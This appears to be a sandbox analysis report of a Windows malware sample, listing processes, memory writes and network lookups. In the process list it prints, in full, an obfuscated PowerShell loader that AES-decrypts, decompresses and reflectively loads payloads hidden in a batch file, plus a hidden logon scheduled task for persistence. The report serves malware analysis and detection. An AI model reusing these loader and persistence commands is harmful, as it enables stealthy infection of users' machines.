PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 1352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 5060 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 5060 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2756 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe

"C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat" "

C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe

"C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_253_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hackforums.net/member.php?action=profile&uid=5420967

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffec4b146f8,0x7ffec4b14708,0x7ffec4b14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 /prefetch:2

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 19.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
